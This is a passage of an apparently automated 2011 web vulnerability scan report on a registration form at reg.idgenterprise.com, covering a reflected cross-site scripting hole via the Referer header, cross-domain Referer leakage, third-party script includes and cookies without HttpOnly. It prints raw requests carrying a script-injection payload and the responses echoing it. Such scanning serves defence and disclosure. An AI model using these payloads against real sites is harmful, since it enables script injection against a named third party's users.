Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:58:07 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:19 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="source['pdrs']" id="source['pdrs']" value="00457660054375CIOLJOA2UVHLH29750"><script>alert(1)</script>15966224188114016,00457660054375CIOLJOA2UVHLH29750">
...[SNIP]...

1.23. http://reg.idgenterprise.com/reg/cio/form/200006520 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af772"><script>alert(1)</script>ba9215c9cf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=af772"><script>alert(1)</script>ba9215c9cf2

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:05 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:17 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="attribute['referrer']" id="attribute['referrer']" value="http://www.google.com/search?hl=en&q=af772"><script>alert(1)</script>ba9215c9cf2" />
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://reg.idgenterprise.com/reg/cio/form/200006520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:55:45 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:06:57 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


                   <script src="http://www.cio.com/js/s_code.js" type="text/javascript"></script>
...[SNIP]...

2.2. http://reg.idgenterprise.com/reg/cio/form/submit/200006520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B
Content-Type: application/x-www-form-urlencoded
Content-Length: 965

segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:30 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:42 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 32326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="small_print">Copyright, 2010, IDG. All Rights Reserved.

       
                                           <a href="http://www.cio.com/privacy-policy">Privacy Policy</a>
...[SNIP]...
</script>


                   <script src="http://www.cio.com/js/s_code.js" type="text/javascript"></script>
...[SNIP]...

3. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://reg.idgenterprise.com/reg/cio/form/200006520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:55:45 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:06:57 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


                   <script src="http://www.cio.com/js/s_code.js" type="text/javascript"></script>
...[SNIP]...

3.2. http://reg.idgenterprise.com/reg/cio/form/submit/200006520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B
Content-Type: application/x-www-form-urlencoded
Content-Length: 965

segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:30 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:42 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 32326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


                   <script src="http://www.cio.com/js/s_code.js" type="text/javascript"></script>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://reg.idgenterprise.com/reg/cio/form/200006520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:55:45 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:06:57 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

4.2. http://reg.idgenterprise.com/reg/cio/form/submit/200006520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B
Content-Type: application/x-www-form-urlencoded
Content-Length: 965

segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:30 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:42 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 32326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

4.3. http://reg.idgenterprise.com/resources/js/basic-registration.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /resources/js/basic-registration.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/js/basic-registration.js HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:55:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 10 Sep 2010 15:42:28 GMT
ETag: "398bc2-270-48fe9980d4100"
Accept-Ranges: bytes
Content-Length: 624
nnCoection: close
Content-Type: application/x-javascript
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:06:57 GMT;path=/;domain=reg.idgenterprise.com

IDG = window.IDG || {};
IDG.regForm = {
preFill: function (data) {
for (var key in data) {
   if (data[key]!=null && data[key].toString().toLowerCase()!='null') {
       $("#segment\\[\\'"+ key
...[SNIP]...

4.4. http://reg.idgenterprise.com/resources/js/jquery-1.4.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /resources/js/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/js/jquery-1.4.2.min.js HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660

Response

HTTP/1.1 200 OK
Age: 786
Date: Mon, 21 Nov 2011 15:51:52 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "398a2c-119ed-48e0be7684f40"
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 17 Aug 2010 21:48:05 GMT
Accept-Ranges: bytes
Content-Length: 72173
nnCoection: close
Content-Type: application/x-javascript
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:03:03 GMT;path=/;domain=reg.idgenterprise.com

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

4.5. http://reg.idgenterprise.com/resources/styles/default.css  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /resources/styles/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/styles/default.css?20101222.10 HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:55:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 06 Sep 2011 16:17:17 GMT
ETag: "39099e-a71-4ac4829473d40"
Accept-Ranges: bytes
Cteonnt-Length: 2673
Cneonction: close
Content-Type: text/css
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:06:58 GMT;path=/;domain=reg.idgenterprise.com
Cache-Control: private
Content-Length: 2673

#basic_reg_form {
   color: #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   margin-left: 5px;
   width: 650px;
}

#basic_reg_form p.title {
   font-size: 14px;
   font-weight: bold;
}

...[SNIP]...

Report generated by XSS.CX at Tue Nov 22 11:41:21 CST 2011.